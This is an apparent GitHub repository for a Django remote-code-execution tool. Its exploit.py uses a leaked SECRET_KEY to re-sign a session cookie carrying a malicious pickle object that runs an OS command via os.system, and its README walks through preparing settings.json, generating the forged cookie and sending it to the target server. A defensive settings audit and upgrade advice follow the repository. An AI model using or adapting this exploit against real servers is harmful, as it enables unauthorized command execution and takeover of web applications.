├── LICENSE
├── README.md
├── exploit.py
├── requirements.txt
└── settings.json

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2024 Spix0r

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Django Pickle RCE Exploit Tool

This tool exploits Django's use of `PickleSerializer` for session cookies, enabling remote code execution (RCE) through a forged cookie.

## Prerequisites

- Python 3.x
- Django installed
- Knowledge of the target system's Django settings, specifically the `SECRET_KEY`, and a valid session cookie.

## How It Works

The exploit works by:

1. Reading the `SECRET_KEY` and a valid session cookie of the target Django project from `settings.json`.
2. Forging a new session cookie that contains a malicious Pickle object.
3. The malicious payload (`PickleRce`) executes a system command when the server deserializes the cookie.

### Exploit Flow:

- **Step 1:** Load Django settings from a `settings.json` file.
- **Step 2:** Extract the `SECRET_KEY` and the target session cookie.
- **Step 3:** Deserialize the cookie, inject a malicious Pickle payload (`PickleRce`), and re-serialize it.
- **Step 4:** Output the forged session cookie, which can be used to trigger the payload.

## Usage

1. Clone the repository:

```bash
git clone https://github.com/Spix0r/django-rce-exploit.git
cd django-rce-exploit
```

2. Prepare your `settings.json` file with the following format:

```json
{
  "settings": [
    {
      "SECRET_KEY": "your_secret_key",
      "Sites_COOKIE": "your_cookie_value"
    }
  ]
}
```

- Replace `"your_secret_key"` with the target Django application's secret key.
- Replace `"your_cookie_value"` with the cookie you want to forge.

3. Run the exploit:

```bash
python3 exploit.py
```

If successful, the script will output a forged cookie that can be used to trigger remote code execution.

## Example

```bash
Forged cookie:
gAJ9cQAoWAMAAAB0ZXN0Y29va2llcQFLAUsALg==
```

You can then send this forged cookie to the Django server to trigger the command injection.

## Customizing the Exploit

By default, the payload executes the command `"YOUR OS COMMAND HERE"`. To customize this, modify the `PickleRce` class in the script:

```python
class PickleRce(object):
    def __reduce__(self):
        return (os.system, ('YOUR_OS_COMMAND',))
```

## Disclaimer

This tool is for educational purposes only. Use it responsibly and only on systems you have permission to test.

## License

This project is licensed under the MIT License.
--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
import django.core.signing, django.contrib.sessions.serializers, pickle, os, sys, json
from django.http import HttpResponse


class PickleRce(object):
    # __reduce__ is what pickle calls on load; returning (callable, args) makes the
    # server run os.system(...) when it deserializes the session.
    def __reduce__(self):
        return (os.system, ('YOUR OS COMMAND HERE',))


# Generate a throwaway settings.py so Django can be configured for the signing calls.
os.system('django-admin startproject exploit && mv exploit/exploit/settings.py . && rm -rf exploit')

with open("settings.json", "r") as settings:
    data = json.load(settings)
    SECRET_KEY = data['settings'][0]['SECRET_KEY']
    cookie = data['settings'][0]['Sites_COOKIE']

try:
    os.environ["DJANGO_SETTINGS_MODULE"] = "settings"
    # Verify and decode the existing session cookie with the leaked key and the
    # salt used by the signed_cookies session backend.
    newContent = django.core.signing.loads(cookie, key=SECRET_KEY,
                                           serializer=django.contrib.sessions.serializers.PickleSerializer,
                                           salt='django.contrib.sessions.backends.signed_cookies')
    newContent['testcookie'] = PickleRce()

    # Re-sign the modified session data so the server accepts it.
    cookie = django.core.signing.dumps(newContent, key=SECRET_KEY,
                                       serializer=django.contrib.sessions.serializers.PickleSerializer,
                                       salt='django.contrib.sessions.backends.signed_cookies',
                                       compress=True)
    print("Forged cookie:\n" + cookie)
except:
    print("an error occurred during forging process, please check settings.py path")
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
django
--------------------------------------------------------------------------------
/settings.json:
--------------------------------------------------------------------------------
{
  "settings": [
    {
      "SECRET_KEY": "Leaked_SECRET_KEY",
      "Sites_COOKIE": "THE_SITES_COOKIE"
    }
  ]
}
--------------------------------------------------------------------------------
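The README's "How It Works" and "Customizing the Exploit" sections hinge on one server-side setting: `PickleSerializer` as the session serializer, which turns any session signed with `SECRET_KEY` into code the server runs on deserialization. The audit below is an added example, not part of this repository: it parses a Django `settings.py` with `ast` (never importing it) and reports the weak session configuration beside its corrected form; `WEAK_SETTINGS` and `FIXED_SETTINGS` are constructed samples with a placeholder key, and the defaults assumed when a setting is absent are Django's documented ones.

```python
import ast  # Python 3.8+ (ast.Constant)

PICKLE = "django.contrib.sessions.serializers.PickleSerializer"
JSON = "django.contrib.sessions.serializers.JSONSerializer"          # Django default since 1.6
SIGNED_COOKIES = "django.contrib.sessions.backends.signed_cookies"
DB_ENGINE = "django.contrib.sessions.backends.db"                    # Django default engine

def session_settings(source):
    """Collect SESSION_SERIALIZER / SESSION_ENGINE string assignments from settings source.
    The file is parsed with ast, never imported, so auditing an untrusted settings.py is safe."""
    found = {"SESSION_SERIALIZER": None, "SESSION_ENGINE": None}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Constant):
            for target in node.targets:
                if isinstance(target, ast.Name) and target.id in found:
                    found[target.id] = node.value.value
    return found

def audit(source):
    """Return findings for the settings source; an empty list means the pickle path is closed."""
    cfg = session_settings(source)
    serializer = cfg["SESSION_SERIALIZER"] or JSON      # unset means Django's JSON default
    engine = cfg["SESSION_ENGINE"] or DB_ENGINE
    findings = []
    if serializer == PICKLE:
        findings.append("SESSION_SERIALIZER = PickleSerializer: a pickle signed with SECRET_KEY "
                        "runs code when the server deserializes it; switch to JSONSerializer")
        if engine == SIGNED_COOKIES:
            findings.append("SESSION_ENGINE = signed_cookies: session data is carried in the "
                            "client cookie, so a forged cookie alone reaches the deserializer")
    return findings

# Constructed sample settings (placeholder key, no real project) for the checks below.
WEAK_SETTINGS = '''
SECRET_KEY = "placeholder-secret-key"
SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"
SESSION_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
'''
FIXED_SETTINGS = '''
SECRET_KEY = "placeholder-secret-key"
SESSION_ENGINE = "django.contrib.sessions.backends.db"
SESSION_SERIALIZER = "django.contrib.sessions.serializers.JSONSerializer"
'''

if __name__ == "__main__":
    for name, src in (("weak", WEAK_SETTINGS), ("fixed", FIXED_SETTINGS)):
        print(name, "->", audit(src) or ["OK"])
```

Django deprecated `PickleSerializer` in 4.1 and removed it in 5.0, so upgrading closes this path outright. If the `SECRET_KEY` has leaked, changing the serializer stops the RCE but the key still needs rotating, because a signed JSON session can still impersonate users.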